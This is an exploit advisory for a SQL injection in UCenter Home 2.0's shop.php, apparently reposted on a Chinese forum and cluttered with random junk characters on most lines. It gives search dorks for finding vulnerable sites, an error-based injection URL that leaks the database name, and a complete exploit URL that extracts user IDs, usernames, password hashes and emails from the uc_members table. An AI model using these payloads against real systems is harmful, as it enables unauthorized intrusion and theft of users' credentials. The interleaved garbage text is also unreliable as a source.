" p; E& P( E g7 d+ s
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
( p; T2 _* Y2 S% |) I' g, v, ?7 `# }% U' h
/ `6 }2 U. U$ u' G8 B
/ U3 q! E# W+ K6 y& ]9 M+ L. Y*/ Author : KnocKout - u* |2 X" ?0 c6 ~$ n/ P! _. L
" t$ q. Y# O9 A# K0 O
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers " d5 ^! T$ g: D
6 ]$ X& Z" ?6 z/ f) J
*/ Contact: knockoutr@msn.com
/ ^# F$ Q9 F* ?# D/ [3 q! p. k/ |" ~" m( i* K) f7 I
*/ Cyber-Warrior.org/CWKnocKout
) t5 w; R( Q/ f* X
9 H6 O0 @% u; n# M( K5 @__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== " Z" R4 C5 V4 j1 f0 g8 t- S
9 V% s9 e# N3 O
Script : UCenter Home
: [1 t' A/ |$ k6 t+ o
3 L- u) }; z; K, L1 O3 aVersion : 2.0 7 c2 t' A4 U& l4 T, X# Q: G& H
& q$ A5 ^3 v1 o( [, K
Script HomePage : http://u.discuz.net/
% I n. i9 E8 n' a! v8 m2 f- J+ C* i5 p$ O( d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 I7 @+ [+ F4 U) z5 H- o4 P1 \
% W s: G; @* D" p" zDork : Powered by UCenter inurl:shop.php?ac=view ( x% |* W1 t0 |8 q" T: k
$ g; \) ^7 S# Y h6 \2 aDork 2 : inurl:shop.php?ac=view&shopid= $ V' [( h$ P5 T3 W9 l
2 Y# T6 U; X/ C: s
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: Z5 B; m$ X5 X* i3 J# h: x' X- ]$ }/ [
Vuln file : Shop.php 8 P) p: O& F- y. e: u; b
, w& H4 M! R' y- C; d0 P5 k
value's : (?)ac=view&shopid=
9 V$ J6 l3 \0 b" B
5 Q6 e4 s( K/ ~2 P* FVulnerable Style : SQL Injection (MySQL Error Based)
: V, ~; }2 p# W8 ~$ X9 e1 I. w7 c* {0 M7 K; Z6 K5 u
Need Metarials : Hex Conversion
" E( Y& I3 |' E* h( c
! u9 w" D- t/ p3 T J& Y5 e__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * {* g3 Q0 ^' y( S! ?
& o+ P' `6 Z2 pYour Need victim Database name.
8 G- }7 Q: R; G/ e" c1 h/ K9 Y3 T5 j: s- L! P
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 [. B7 ~/ Q4 v0 }3 \- D
6 D- `! ^- p: L; d, e S' f$ ?
..
- m1 c. w& }# u/ Q$ {2 G
* W5 J# ^ G; g; }; yDB : Okey.
$ [6 `' |. s4 ?' c; J* G: g% b$ M) V
your edit DB `[TARGET DB NAME]` 1 a! X8 g) f) n1 @8 n+ P+ z5 R/ g, X0 B
& q! ?4 _+ r# g% b0 S6 JExample : 'hiwir1_ucenter'
7 ^/ G% B! I h
9 Q3 b0 M+ l- J3 ?2 m0 _; t+ }Edit : Okey.
2 Z8 x: ?/ X- f' d
7 \6 s$ e- y5 w6 dYour use Hex conversion. And edit Your SQL Injection Exploit.. 3 ]5 V/ V3 o, k" M/ q3 S
: Q" U. Q9 f6 L6 l
k: U, J( l e4 L5 a- g% P& ?; U" k9 n2 P0 d4 w
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 0 {5 c( P. M& d! `8 |
|
发表于 2013-2-27 21:31:31
收藏
支持
反对